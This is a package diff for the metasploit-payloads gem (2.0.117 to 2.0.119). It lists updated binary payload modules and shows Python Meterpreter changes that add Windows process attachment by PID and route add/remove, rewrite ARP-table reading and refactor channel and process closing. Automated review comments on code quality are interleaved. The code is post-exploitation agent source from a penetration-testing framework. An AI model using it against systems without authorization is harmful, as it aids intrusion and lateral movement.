metasploit-payloads 2.0.117 → 2.0.119
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/data/android/meterpreter.jar +0 -0
- data/data/android/metstage.jar +0 -0
- data/data/android/shell.jar +0 -0
- data/data/meterpreter/elevator.x64.debug.dll +0 -0
- data/data/meterpreter/elevator.x64.dll +0 -0
- data/data/meterpreter/elevator.x86.debug.dll +0 -0
- data/data/meterpreter/elevator.x86.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.py +108 -13
- data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
- data/data/meterpreter/meterpreter.py +27 -25
- data/data/meterpreter/metsrv.x64.debug.dll +0 -0
- data/data/meterpreter/metsrv.x64.dll +0 -0
- data/data/meterpreter/metsrv.x86.debug.dll +0 -0
- data/data/meterpreter/metsrv.x86.dll +0 -0
- data/data/meterpreter/screenshot.x64.debug.dll +0 -0
- data/data/meterpreter/screenshot.x64.dll +0 -0
- data/data/meterpreter/screenshot.x86.debug.dll +0 -0
- data/data/meterpreter/screenshot.x86.dll +0 -0
- data/lib/metasploit-payloads/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +2 -2
- metadata.gz.sig +0 -0
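--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz:
-data.tar.gz:
+metadata.gz: b67e513ed92128da0555d06d5700100438229971a8750aefac72059efec74eb8
+data.tar.gz: 90a3af70071ac13b8b29db40a47868c5221361e14ad21aec997d1cfb52634d03
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: c961adbd35fd2999240f21e45383fa2ebd11edae361b65858361989ca32decc61d79b0259dcc0892ec65d714baed184f00d16499a6c4d5454599d268511c90ae
+data.tar.gz: 7d90eebd468b2f28d536d395e62a29a4f1f342a72fa7141f2c4816887331e7cd5cea21906f8c717fb2b056f09fe316091171ba64170c728f87e7086773e7e95c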
checksums.yaml.gz.sig
CHANGED
Binary file
|
Binary file
|
data/data/android/metstage.jar
CHANGED
Binary file
|
data/data/android/shell.jar
CHANGED
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
@@ -1002,6 +1002,9 @@ def getaddrinfo_from_request(request, socktype, proto):
|
|
1002
1002
|
local_address_info = None
|
1003
1003
|
return peer_address_info, local_address_info
|
1004
1004
|
|
1005
|
+
def addr_atoi4(address):
|
1006
|
+
return struct.unpack('!I', socket.inet_aton(address))[0]
|
1007
|
+
|
1005
1008
|
def netlink_request(req_type, req_data):
|
1006
1009
|
# See RFC 3549
|
1007
1010
|
NLM_F_REQUEST = 0x0001
|
@@ -1336,6 +1339,28 @@ def stdapi_sys_config_sysinfo(request, response):
|
|
1336
1339
|
response += tlv_pack(TLV_TYPE_ARCHITECTURE, get_system_arch())
|
1337
1340
|
return ERROR_SUCCESS, response
|
1338
1341
|
|
1342
|
+
@register_function_if(has_windll)
|
1343
|
+
def stdapi_sys_process_attach(request, response):
|
1344
|
+
pid = packet_get_tlv(request, TLV_TYPE_PID)['value']
|
1345
|
+
if not pid:
|
1346
|
+
GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
|
1347
|
+
GetCurrentProcess.restype = ctypes.c_void_p
|
1348
|
+
handle = GetCurrentProcess()
|
1349
|
+
else:
|
1350
|
+
inherit = packet_get_tlv(request, TLV_TYPE_INHERIT)['value']
|
1351
|
+
permissions = packet_get_tlv(request, TLV_TYPE_PROCESS_PERMS)['value']
|
1352
|
+
|
1353
|
+
OpenProcess = ctypes.windll.kernel32.OpenProcess
|
1354
|
+
OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_bool, ctypes.c_uint32]
|
1355
|
+
OpenProcess.restype = ctypes.c_void_p
|
1356
|
+
handle = OpenProcess(permissions, inherit, pid)
|
1357
|
+
if not handle:
|
1358
|
+
return error_result_windows(), response
|
1359
|
+
meterpreter.processes[handle] = None
|
1360
|
+
debug_print('[*] added process id: ' + str(pid) + ', handle: ' + str(handle))
|
1361
|
+
response += tlv_pack(TLV_TYPE_HANDLE, handle)
|
1362
|
+
return ERROR_SUCCESS, response
|
1363
|
+
|
1339
1364
|
@register_function
|
1340
1365
|
def stdapi_sys_process_close(request, response):
|
1341
1366
|
proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)['value']
|
@@ -1901,19 +1926,22 @@ def stdapi_net_config_get_arp_table(request, response):
|
|
1901
1926
|
if not os.path.exists(arp_cache_file):
|
1902
1927
|
return ERROR_NOT_SUPPORTED, response
|
1903
1928
|
|
1904
|
-
|
1905
|
-
|
1906
|
-
|
1907
|
-
|
1908
|
-
|
1909
|
-
|
1910
|
-
|
1911
|
-
|
1912
|
-
|
1913
|
-
|
1914
|
-
|
1915
|
-
|
1916
|
-
|
1929
|
+
arp_cache = open('/proc/net/arp', 'r')
|
1930
|
+
lines = arp_cache.readlines()
|
1931
|
+
for line in lines[1:]:
|
1932
|
+
fields = line.split()
|
1933
|
+
ip_address = fields[0]
|
1934
|
+
mac_address = fields[3]
|
1935
|
+
mac_address = bytes().join(binascii.unhexlify(h) for h in mac_address.split(':'))
|
1936
|
+
interface_name = fields[5]
|
1937
|
+
arp_tlv = bytes()
|
1938
|
+
arp_tlv += tlv_pack(TLV_TYPE_IP, socket.inet_aton(ip_address))
|
1939
|
+
arp_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, mac_address)
|
1940
|
+
arp_tlv += tlv_pack(TLV_TYPE_MAC_NAME, interface_name)
|
1941
|
+
response += tlv_pack(TLV_TYPE_ARP_ENTRY, arp_tlv)
|
1942
|
+
arp_cache.close()
|
1943
|
+
else:
|
1944
|
+
return ERROR_NOT_SUPPORTED, response
|
1917
1945
|
return ERROR_SUCCESS, response
|
1918
1946
|
|
1919
1947
|
@register_function
|
@@ -2124,6 +2152,73 @@ def stdapi_net_config_get_routes(request, response):
|
|
2124
2152
|
response += tlv_pack(TLV_TYPE_NETWORK_ROUTE, route_tlv)
|
2125
2153
|
return ERROR_SUCCESS, response
|
2126
2154
|
|
2155
|
+
def _win_route_add_remove(is_add, request, response):
|
2156
|
+
class IPAddr(ctypes.Structure):
|
2157
|
+
_fields_ = [
|
2158
|
+
("S_addr", ctypes.c_ulong)]
|
2159
|
+
|
2160
|
+
MIB_IPROUTE_TYPE_INDIRECT = 4
|
2161
|
+
MIB_IPPROTO_NETMGMT = 3
|
2162
|
+
|
2163
|
+
GetBestInterface = ctypes.windll.Iphlpapi.GetBestInterface
|
2164
|
+
GetBestInterface.argtypes = [IPAddr, ctypes.POINTER(ctypes.c_ulong)]
|
2165
|
+
GetBestInterface.restype = ctypes.c_ulong
|
2166
|
+
|
2167
|
+
CreateIpForwardEntry = ctypes.windll.Iphlpapi.CreateIpForwardEntry
|
2168
|
+
CreateIpForwardEntry.argtypes = [PMIB_IPFORWARDROW]
|
2169
|
+
CreateIpForwardEntry.restype = ctypes.c_ulong
|
2170
|
+
|
2171
|
+
DeleteIpForwardEntry = ctypes.windll.Iphlpapi.DeleteIpForwardEntry
|
2172
|
+
DeleteIpForwardEntry.argtypes = [PMIB_IPFORWARDROW]
|
2173
|
+
DeleteIpForwardEntry.restype = ctypes.c_ulong
|
2174
|
+
|
2175
|
+
GetIpInterfaceEntry = ctypes.windll.Iphlpapi.GetIpInterfaceEntry
|
2176
|
+
GetIpInterfaceEntry.argtypes = [ctypes.POINTER(MIB_IPINTERFACE_ROW)]
|
2177
|
+
GetIpInterfaceEntry.restype = ctypes.c_ulong
|
2178
|
+
|
2179
|
+
subnet = packet_get_tlv(request, TLV_TYPE_SUBNET_STRING)['value']
|
2180
|
+
netmask = packet_get_tlv(request, TLV_TYPE_NETMASK_STRING)['value']
|
2181
|
+
gateway = packet_get_tlv(request, TLV_TYPE_GATEWAY_STRING)['value']
|
2182
|
+
|
2183
|
+
route = MIB_IPFORWARDROW()
|
2184
|
+
route.dwForwardDest = socket.ntohl(addr_atoi4(subnet))
|
2185
|
+
route.dwForwardMask = socket.ntohl(addr_atoi4(netmask))
|
2186
|
+
route.dwForwardNextHop = socket.ntohl(addr_atoi4(gateway))
|
2187
|
+
route.dwForwardType = MIB_IPROUTE_TYPE_INDIRECT
|
2188
|
+
route.dwForwardProto = MIB_IPPROTO_NETMGMT
|
2189
|
+
route.dwForwardAge = -1
|
2190
|
+
route.dwForwardMetric1 = 0
|
2191
|
+
|
2192
|
+
best_iface = ctypes.c_ulong()
|
2193
|
+
ip_addr = IPAddr(socket.ntohl(addr_atoi4(subnet)))
|
2194
|
+
result = GetBestInterface(ip_addr, ctypes.byref(best_iface))
|
2195
|
+
if result != ERROR_SUCCESS:
|
2196
|
+
return error_result_windows(result), response
|
2197
|
+
route.dwForwardIfIndex = best_iface
|
2198
|
+
|
2199
|
+
iface = MIB_IPINTERFACE_ROW(Family=WIN_AF_INET, InterfaceIndex=route.dwForwardIfIndex)
|
2200
|
+
result = GetIpInterfaceEntry(ctypes.byref(iface))
|
2201
|
+
if result != ERROR_SUCCESS:
|
2202
|
+
return error_result_windows(result), response
|
2203
|
+
route.dwForwardMetric1 = iface.Metric
|
2204
|
+
|
2205
|
+
if is_add:
|
2206
|
+
result = CreateIpForwardEntry(ctypes.byref(route))
|
2207
|
+
else:
|
2208
|
+
result = DeleteIpForwardEntry(ctypes.byref(route))
|
2209
|
+
if result != ERROR_SUCCESS:
|
2210
|
+
return error_result_windows(result), response
|
2211
|
+
|
2212
|
+
return ERROR_SUCCESS, response
|
2213
|
+
|
2214
|
+
@register_function_if(has_windll)
|
2215
|
+
def stdapi_net_config_add_route(request, response):
|
2216
|
+
return _win_route_add_remove(True, request, response)
|
2217
|
+
|
2218
|
+
@register_function_if(has_windll)
|
2219
|
+
def stdapi_net_config_remove_route(request, response):
|
2220
|
+
return _win_route_add_remove(False, request, response)
|
2221
|
+
|
2127
2222
|
def stdapi_net_config_get_routes_via_netlink():
|
2128
2223
|
rta_align = lambda l: l+3 & ~3
|
2129
2224
|
responses = netlink_request(RTM_GETROUTE, RTMSG(family=socket.AF_UNSPEC))
|
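Review bot: The Linux branch at new line 1929 opens the literal `'/proc/net/arp'` instead of the `arp_cache_file` whose existence was just checked on 1926, and the handle is only closed on the happy path at 1942, so an IndexError from `fields[5]` on a short line, a `binascii.Error` from `unhexlify` on a malformed MAC, or a failing `inet_aton` leaves the file open while the exception propagates out of the handler. Use the variable and a context manager: `with open(arp_cache_file, 'r') as arp_cache:` / `lines = arp_cache.readlines()`, keep the parsing loop after the block on the already-read `lines`, and drop `arp_cache.close()`. The enclosing stdapi_net_config_get_arp_table starts outside the hunk, so which platform test the `else:` at 1943 pairs with is not visible here. In the route hunk, `route.dwForwardIfIndex = best_iface` at 2197 assigns the ctypes object rather than `best_iface.value`; ctypes copies it, but `.value` makes the intent explicit.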
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
@@ -1259,6 +1259,21 @@ class PythonMeterpreter(object):
|
|
1259
1259
|
self.next_channel_id += 1
|
1260
1260
|
return idx
|
1261
1261
|
|
1262
|
+
def close_channel(self, channel_id):
|
1263
|
+
if channel_id not in self.channels:
|
1264
|
+
return False
|
1265
|
+
channel = self.channels[channel_id]
|
1266
|
+
try:
|
1267
|
+
channel.close()
|
1268
|
+
except Exception:
|
1269
|
+
debug_traceback('[-] failed to close channel id: ' + str(channel_id))
|
1270
|
+
return False
|
1271
|
+
del self.channels[channel_id]
|
1272
|
+
if channel_id in self.interact_channels:
|
1273
|
+
self.interact_channels.remove(channel_id)
|
1274
|
+
debug_print('[*] closed and removed channel id: ' + str(channel_id))
|
1275
|
+
return True
|
1276
|
+
|
1262
1277
|
def add_process(self, process):
|
1263
1278
|
if has_windll:
|
1264
1279
|
PROCESS_ALL_ACCESS = 0x1fffff
|
@@ -1274,37 +1289,24 @@ class PythonMeterpreter(object):
|
|
1274
1289
|
return handle
|
1275
1290
|
|
1276
1291
|
def close_process(self, proc_h_id):
|
1277
|
-
|
1278
|
-
if not proc_h:
|
1292
|
+
if proc_h_id not in self.processes:
|
1279
1293
|
return False
|
1280
|
-
|
1281
|
-
|
1282
|
-
|
1283
|
-
|
1284
|
-
|
1285
|
-
|
1286
|
-
|
1294
|
+
proc_h = self.processes.pop(proc_h_id)
|
1295
|
+
if proc_h:
|
1296
|
+
# proc_h is only set when we started the process via execute and not when we attached to it
|
1297
|
+
for channel_id, channel in self.channels.items():
|
1298
|
+
if not isinstance(channel, MeterpreterProcess):
|
1299
|
+
continue
|
1300
|
+
if not channel.proc_h is proc_h:
|
1301
|
+
continue
|
1302
|
+
self.close_channel(channel_id)
|
1303
|
+
break
|
1287
1304
|
if has_windll:
|
1288
1305
|
CloseHandle = ctypes.windll.kernel32.CloseHandle
|
1289
1306
|
CloseHandle.argtypes = [ctypes.c_void_p]
|
1290
1307
|
CloseHandle.restype = ctypes.c_long
|
1291
1308
|
CloseHandle(proc_h_id)
|
1292
|
-
debug_print('[*] closed and removed process
|
1293
|
-
return True
|
1294
|
-
|
1295
|
-
def close_channel(self, channel_id):
|
1296
|
-
if channel_id not in self.channels:
|
1297
|
-
return False
|
1298
|
-
channel = self.channels[channel_id]
|
1299
|
-
try:
|
1300
|
-
channel.close()
|
1301
|
-
except Exception:
|
1302
|
-
debug_traceback('[-] failed to close channel id: ' + str(channel_id))
|
1303
|
-
return False
|
1304
|
-
del self.channels[channel_id]
|
1305
|
-
if channel_id in self.interact_channels:
|
1306
|
-
self.interact_channels.remove(channel_id)
|
1307
|
-
debug_print('[*] closed and removed channel id: ' + str(channel_id))
|
1309
|
+
debug_print('[*] closed and removed process handle: ' + str(proc_h_id))
|
1308
1310
|
return True
|
1309
1311
|
|
1310
1312
|
def get_packet(self):
|
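Review bot: `CloseHandle(proc_h_id)` at new line 1308 discards its return value, so close_process logs "closed and removed" on 1309 and returns `True` on 1310 even when the kernel rejected the handle, and because the entry was already popped from `self.processes` on 1294 the caller cannot tell. Capture it: `if not CloseHandle(proc_h_id):` / `debug_print('[-] CloseHandle failed for process handle: ' + str(proc_h_id))` / `return False`. Separately, `if not channel.proc_h is proc_h:` on 1300 reads as negating the whole comparison; the idiomatic form is `if channel.proc_h is not proc_h:`. The `break` on 1303 closes only the first MeterpreterProcess channel bound to proc_h, which is presumably intentional but worth a comment.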
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
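--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-version: 2.0.
+version: 2.0.119
 platform: ruby
 authors:
 - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
 EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
 9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
 -----END CERTIFICATE-----
-date: 2023-03-
+date: 2023-03-07 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: rake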
metadata.gz.sig
CHANGED
Binary file
|